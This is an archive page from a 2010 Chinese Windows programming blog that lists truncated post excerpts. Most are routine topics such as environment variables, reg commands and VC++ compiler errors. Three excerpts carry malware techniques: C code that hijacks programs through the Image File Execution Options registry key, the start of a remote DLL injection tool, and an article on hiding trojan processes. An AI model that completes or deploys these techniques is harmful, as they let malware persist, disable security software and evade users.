2010年6月4日
%ALLUSERSPROFILE% 列出所有用户Profile文件位置。 %APPDATA% 列出应用程序数据的默认存放位置。 %CD% 列出当前目录。 %CLIENTNAME% 列出联接到终端服务会话时客户端的NETBIOS名。 %CMDCMDLINE% 列出启动当前cmd.exe所使用的命令行。 %CMDEXTVERSION% 命令出当前命令处理程序扩展版本号。 %CommonProgramFiles% 列出了常用文件的文件夹路径。 %COMPUTERNAME% 列出了计算机名。 %COMSPEC% 列出了可执……
阅读全文
2010年6月4日
Reg修改注册表命令详解 编辑注册表不当可能会严重损坏您的系统。在更改注册表之前,应备份计算机上任何有价值的数据。 只有在别无选择的情况下,才直接编辑注册表。注册表编辑器会忽略标准的安全措施,从而使得这些设置会降低性能、破坏系统,甚至要求用户重新安装Windows。可以利用“控制面板……
阅读全文
2010年6月4日
(转)VC应用 —— 个性化你的工具栏图标 2009-04-21 16:45 <p> 1. 下载一个可以制作真彩工具栏图标的免费的小工具,叫做TBCreator。CSDN上传文件实在是太慢,还经常出现问题,所以大家可以到Baidu和google上找一下,很方便的。<br /> 利用它,可以把找到的需要合并的图标加进去,自动合……
阅读全文
2010年6月4日
有时,我为了编译仅有一个源文件的C/C++代码,不得不建立一个VC的工程,工程编译后会生成一堆文件,我不需要搞得如此庞大。后来我改用命令行编译,但是我需要输入冗长的参数来编译。为了一劳永逸地解决这个问题,我就试着将我常用的EditPlus设置为编译器的IDE。 只要修改一下VC安装……
阅读全文
2010年6月4日
#include <stdio.h> #include <windows.h> int main(int argc, char* argv[]) { char temp[256]; DWORD ret; LPCTSTR szRegKey=“SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options”; //定义字符串指针,保存映像劫持的键位 HKEY h_KEY; if(argc!=1) //如果参数不是1个,提取第2个参数,也就是被劫持程序的路径 { memset(temp,0,256); strcpy(temp,argv[1]); for(int i=0;i<strlen(temp);i++) //将路径中的\换为/,也可以换为\,就是代码长了点 { if(temp[i]==’\') temp[i]=’/'; } ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey,0,KEY_ALL_ACCESS,&h_KEY); //打开注册表中需要映像劫持的子键获得句柄 if(ret==ERROR_SUCCESS) { printf(“open ok!\n”); if(ERROR_SUCCESS==RegDeleteKey(h_KEY,“rav.exe”)) //将上面打……
阅读全文
2010年6月4日
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Author: [Shotgun] // // Email: [Shotgun@Xici.Net] // // Homepage: // // [http://IT.Xici.Net] // // [http://WWW.Patching.Net] // // // // USAGE: // // RmtDLL.exe PID[|ProcessName] DLLFullPathName // // Example: // // RmtDLL.exe 1024 C:\WINNT\System32\MyDLL.dll // // RmtDLL.exe Explorer.exe C:\MyDLL.dll // // // ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// #include<windows.h> #include<stdlib.h> #include<stdio.h> #include<psapi.h> DWORD ProcessToPID( char *); //将进程名转换为PID的函数 void CheckError ( int, int, char *); //出错处理函数 void usage ( char *); //使用说明函数 PDWORD pdwThreadId; HANDLE hRemoteThread, hRemoteProcess; DWORD fdwCreate, dwStackSize, dwRemoteProcessId; PWSTR pszLibFileRemote=NULL; void main(int argc,char **argv) { int iReturnCode; char lpDllFullPathName[MAX_PATH]; WCHAR pszLibFileName[MAX_PATH]={0}; //处理命令行参数 if (argc!=3) usage(“Param……
阅读全文
2010年6月4日
木马运行关键是隐藏,神不知鬼不觉才是王道.要隐藏,先要隐藏进程,Windows操作系统中程序以进程的方式运行,大多数操作系统也是如此.任务管理器就可以看到当前运行的进程,所以有人HOOK相关枚举进程的函数,让任务管理器不显示木马进程,也有人把自己的木马注册成服务运行,”任务管理器……
阅读全文
2010年6月4日
1、fatal error C1010: unexpected end of file while looking for precompiled header directive。 寻找预编译头文件路径时遇到了不该遇到的文件尾。(一般是没有#include “stdafx.h”) 2、fatal error C1083: Cannot open include file: ‘R…….h’: No such file or directory 不能打开包含文件“R…….h”:没有这样的文件或目录。 3、error C2011: ‘C………
阅读全文